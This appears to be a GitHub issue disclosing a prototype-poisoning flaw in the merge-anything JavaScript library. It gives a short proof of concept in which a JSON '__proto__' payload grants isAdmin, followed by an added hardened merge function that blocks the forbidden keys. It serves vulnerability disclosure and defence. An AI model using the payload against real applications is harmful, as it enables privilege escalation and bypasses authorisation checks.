Merge objects & other types recursively. A simple & small integration.
POC:

```js
import { merge } from 'merge-anything'

const defaultPermissions = {
  read: true,
  write: false,
  delete: false,
};

// Attacker-controlled JSON carrying an own "__proto__" key
const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');

// After the merge, isAdmin is reachable on the result through its prototype
const userPermissions = merge({}, defaultPermissions, payload);

console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin']);
if (userPermissions.isAdmin) {
  console.log('User has admin access');
} else {
  console.log('User does not have admin access');
}
```

This code demonstrates how prototype poisoning can occur by merging an object containing a `__proto__` property with default permissions using the merge-anything library. The `isAdmin` property is injected into the object's prototype.

Implications

- Unauthorized Access: Users can gain elevated permissions without proper authorization.
- Security Breach: Compromised data integrity and potential for privilege escalation.
- Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities.

Mitigation

- Specifically check for keys like "__proto__", "prototype", "constructor".

Since this library has a lot of weekly downloads, there might be multiple use cases that might be affected by this bug.
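A hardened deep merge that applies the mitigation above, as an added example that is not part of the issue or of merge-anything's own code: it copies only own enumerable keys, drops `__proto__`, `prototype` and `constructor` at every nesting level, and the payload it merges is constructed to mirror the one in the report (the `scopes` key is added to show that ordinary nested objects still merge).

```javascript
'use strict';

// Keys that, when written via target[key], reach the prototype chain
// rather than creating an own property on the target.
const FORBIDDEN_KEYS = new Set(['__proto__', 'prototype', 'constructor']);

function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Deep-merge plain-object sources into a fresh object. Forbidden keys are
// skipped outright; everything else is defined as an own data property so
// no inherited setter ever runs. Non-object sources are ignored.
function safeMerge(...sources) {
  const target = {};
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    for (const key of Object.keys(source)) {       // own enumerable keys only
      if (FORBIDDEN_KEYS.has(key)) continue;       // drop, never assign
      const value = source[key];
      const existing = Object.prototype.hasOwnProperty.call(target, key)
        ? target[key] : undefined;
      let merged = value;
      if (isPlainObject(value)) {
        merged = isPlainObject(existing) ? safeMerge(existing, value) : safeMerge(value);
      }
      Object.defineProperty(target, key, {
        value: merged, writable: true, enumerable: true, configurable: true,
      });
    }
  }
  return target;
}

// Constructed inputs (assumed shape, not real application data).
const DEFAULT_PERMISSIONS = { read: true, write: false, delete: false };
const PAYLOAD = JSON.parse(
  '{"__proto__": {"isAdmin": true}, "scopes": {"reports": true}}'
);

// Merge the untrusted payload and report what an authorisation check would see.
function checkPermissions() {
  const perms = safeMerge(DEFAULT_PERMISSIONS, PAYLOAD);
  return {
    isAdmin: perms.isAdmin === true,
    hasOwnIsAdmin: Object.prototype.hasOwnProperty.call(perms, 'isAdmin'),
    globalPolluted: ({}).isAdmin !== undefined,   // Object.prototype untouched?
    scopesReports: perms.scopes.reports,
  };
}
```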
The issue was opened by 0xhexr4 and has received 1 comment.